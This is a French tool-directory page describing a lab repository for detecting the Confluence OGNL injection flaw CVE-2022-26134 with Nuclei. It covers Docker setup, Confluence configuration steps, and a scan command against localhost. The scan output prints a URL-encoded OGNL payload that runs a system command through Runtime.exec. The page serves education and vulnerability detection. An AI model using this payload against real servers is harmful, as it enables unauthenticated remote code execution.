Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-26134-LAB — Détection de CVE-2022-26134 en utilisant Nuclei | Kitploit
Outils/GitHubGitHub/skhalsa-sigsci/cve-2022-26134-lab
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubskhalsa-sigsci/cve-2022-26134-lab

CVE-2022-26134-LAB

Détection de CVE-2022-26134 en utilisant Nuclei

Voir le dépôt
31il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-26134-LAB

Confluence Server et Confluence Data Center incluent une importante vulnérabilité d’exécution de code à distance non authentifiée identifiée sous le nom CVE-2022-26134, selon un avis de sécurité publié par Atlassian le 2 juin 2022. La vulnérabilité n’était pas corrigée lors de sa publication le 2 juin et était exploitée dans la nature. Depuis le 3 juin, des correctifs et une solution de contournement temporaire sont disponibles.

Ce dépôt est destiné uniquement à des fins expérimentales et éducatives.

Dépendances

  • Docker
  • Nuclei

Environnement Confluence vulnérable

Lancement de l’environnement vulnérable

root@kitploit:~
docker-compose up

Une fois démarré, vous pouvez accéder au serveur Confluence en utilisant l’URL suivante :

http://127.0.0.1:8090/

Configuration du serveur Confluence

  1. La première fois que vous visitez le site, vous serez guidé à travers la configuration.
  2. Ne cochez aucune case et sélectionnez « Next » sur la page « Get apps ».
  3. Sur la page de la clé de licence, cliquez sur le lien indiquant « Get an evaluation license ».
  • Vous serez redirigé vers my.atlassian.com. Assurez-vous que le type de licence sélectionné est Confluence (Data Center). Saisissez le nom d’organisation de votre choix. Assurez-vous que le bouton radio « Your instance is » est réglé sur « up and running ». Une fois ces détails vérifiés, cliquez sur le bouton « Generate License ».
  • Une fenêtre modale de confirmation apparaîtra vous demandant si vous souhaitez l’installer sur le serveur : 127.0.0.1. Sélectionnez « Yes ».
  • En sélectionnant « Yes », la clé de licence sera automatiquement remplie sur votre instance locale de Confluence. Sélectionnez « Next ».
  • Choisissez le type de déploiement « Standalone » et sélectionnez « Next ».
  • Sur la page de configuration de la base de données, les détails doivent être saisis comme suit :
    • Database type : PostgreSQL
    • Setup type : Simple
    • Hostname : db
    • Port : 5432
    • Database name : confluence
    • Username : confluence
    • Password : 123456789
  • Après avoir rempli ces champs, appuyez sur le bouton « Test connection ». Vous devriez recevoir le message « Success! Database connected successfully ». Cliquez ensuite sur « Next ».
  • La configuration de votre base de données va commencer. Cela peut prendre un certain temps. Patientez.
  • Une fois la configuration de la base de données terminée, vous vous trouverez sur la page « Load Content ». Sélectionnez le bouton « Example Site ».
  • Ensuite, sur la page « Configure User Management », sélectionnez « Manage users and groups with Confluence ».
  • Ensuite, sur la page « Configure System Administrator Account », créez un compte et sélectionnez « Next ».
  • Une fois terminé, vous verrez que la configuration a réussi. Appuyez sur « Start ».
  • Il vous sera demandé de « Create a space to store your work ». Saisissez le nom d’espace de votre choix.
  • Ignorez le tutoriel.
  • Vous avez maintenant terminé la configuration d’évaluation du serveur Confluence.
  • Détection de CVE-2022-26134

    La vulnérabilité est une injection OGNL affectant le serveur HTTP. La charge utile OGNL est placée dans l’URI d’une requête HTTP. Toute méthode HTTP semble fonctionner, qu’elle soit valide (GET, POST, PUT, etc.) ou invalide (par exemple « BALH »).

    https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis

    Utilisation de Nuclei

    Exécutez la commande Nuclei suivante :

    root@kitploit:~
    nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml
    

    Sortie du scan

    root@kitploit:~
    [CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]
    
    Télécharger l’outil